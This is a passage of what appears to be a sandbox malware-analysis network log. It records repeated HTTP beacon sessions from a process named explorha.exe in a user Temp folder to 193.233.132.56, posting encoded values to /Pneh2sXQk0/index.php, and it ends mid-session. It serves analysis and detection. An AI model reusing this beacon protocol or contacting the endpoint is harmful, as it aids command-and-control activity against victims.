                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:46.760263920 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    51  192.168.2.4  49787  193.233.132.56  80  5900  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Apr 19, 2024 04:26:47.110914946 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:47.358378887 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:47.359117985 CEST  310  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:47.611823082 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    52  192.168.2.4  49788  193.233.132.56  80  5900  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Apr 19, 2024 04:26:47.971313000 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:48.220345974 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:48.222172022 CEST  310  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:48.475574017 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    53  192.168.2.4  49789  193.233.132.56  80  5900  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Apr 19, 2024 04:26:48.827059984 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:49.074484110 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:49.075346947 CEST  310  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:49.327601910 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    54 | 192.168.2.4 | 49790 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:49.688937902 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:49.936506033 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:49.937239885 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:50.188977003 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    55 | 192.168.2.4 | 49791 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:50.544281960 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:50.787827969 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:50.790215969 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:51.037442923 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    56 | 192.168.2.4 | 49792 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:51.389873981 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:51.635653973 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:51.636625051 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:51.898878098 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    57 | 192.168.2.4 | 49793 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:52.251868963 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:52.499845982 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:52.500591040 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:52.752819061 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    58 | 192.168.2.4 | 49794 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:53.113727093 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:53.364538908 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:53.365361929 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:53.620805979 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    59 | 192.168.2.4 | 49795 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:53.999582052 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:54.249661922 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:54.527724028 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:54.783443928 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49796 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:55.193486929 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:55.441860914 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:55.443481922 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:55.703181982 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49797 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:56.060647964 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:56.300904036 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:56.301580906 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:56.546212912 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49798 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:56.906132936 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:57.150888920 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:57.232080936 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:57.482543945 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49799 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:57.841542006 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
